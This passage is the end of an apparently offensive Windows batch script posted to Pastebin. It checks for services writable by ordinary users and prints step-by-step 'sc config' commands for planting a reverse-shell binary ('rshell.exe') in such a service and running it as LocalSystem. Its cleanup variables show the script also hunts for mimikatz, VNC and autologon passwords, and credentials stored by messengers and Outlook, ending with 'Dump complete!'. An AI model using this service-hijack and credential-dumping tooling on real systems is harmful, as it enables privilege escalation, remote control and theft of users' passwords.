  586.     if %ERRORLEVEL% == 0 (
  587.         echo.**** !!! VULNERABLE SERVICES FOUND - Authenticated Users!!! ****
  588.         accesschk.exe -uwcqv "Authenticated Users" *
  589.         echo.****************************************************************
  590.         echo.
  591.     )
  592.     accesschk.exe /accepteula 1>2>NUL
  593.     accesschk.exe -uwcqv "Users" * | Find "RW " 1> NUL
  594.     if %ERRORLEVEL% == 0 (
  595.         echo.**** !!! VULNERABLE SERVICES FOUND - All Users !!! ****
  596.         accesschk.exe -uwcqv "Users" *
  597.         echo.*******************************************************
  598.         echo.To plant binary in service use:
  599.         echo.sc config [service_name] binpath= "C:\rshell.exe"
  600.         echo.sc config [service_name] obj= ".\LocalSystem" password= ""
  601.         echo.sc qc [service_name] (to verify!)
  602.         echo.net start [service_name]
  603.         echo.*******************************************************
  604.     )
  605.     accesschk.exe /accepteula 1>2>NUL
  606.     accesschk.exe -uwcqv "Everyone" * | Find "RW " 1> NUL
  607.     if %ERRORLEVEL% == 0 (
  608.         echo.**** !!! VULNERABLE SERVICES FOUND - Everyone !!! ****
  609.         accesschk.exe -uwcqv "Everyone" *
  610.         echo.*******************************************************
  611.         echo.To plant binary in service use:
  612.         echo.sc config [service_name] binpath= "C:\rshell.exe"
  613.         echo.sc config [service_name] obj= ".\LocalSystem" password= ""
  614.         echo.sc qc [service_name] (to verify!)
  615.         echo.net start [service_name]
  616.         echo.*******************************************************
  617. goto:eof
  618.  
  619. :cleanup
  620. set jollykatz=
  621. set accesschk=
  622. set OSbit=
  623. set whoami=
  624. set runningelevatedprompt=
  625. set netshfirewall=
  626. set OSVersion=
  627. set alwaysinstallelevated=
  628. set realvncpassfound=
  629. set tightvncpassfound1=
  630. set tightvncpassfound2=
  631. set tigervncpassfound=
  632. set vnc3passfound1=
  633. set vnc3passfound2=
  634. set vnc3passfound3=
  635. set winautologinpassfound=
  636. set winautologindomainfound=
  637. set winautologinuserfound=
  638. set defaultloginpass=
  639. set IE6found=
  640. set IE7found=
  641. set AIM6found=
  642. set AIMPROfound=
  643. set BEYLUXEfound=
  644. set BIGANTfound=
  645. set CAMFROGfound=
  646. set GOOGLETALKfound=
  647. set IMVUfound=
  648. set NIMBUZZfound=
  649. set PALTALKfound=
  650. set YAHOOPAGERfound=
  651. set INCREDIMAILfound=
  652. set OUTLOOK2013found=
  653. set OUTLOOK2010POSTNTfound=
  654. set OUTLOOK2010PRENTfound=
  655. set OUTLOOK98MAILONLYfound=
  656. set OUTLOOK98NORMALfound=
  657. goto:eof
  658.  
  659. :end
  660. echo.
  661. echo.==============
  662. echo.Dump complete!
  663. echo.==============
  664. GOTO:eof
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!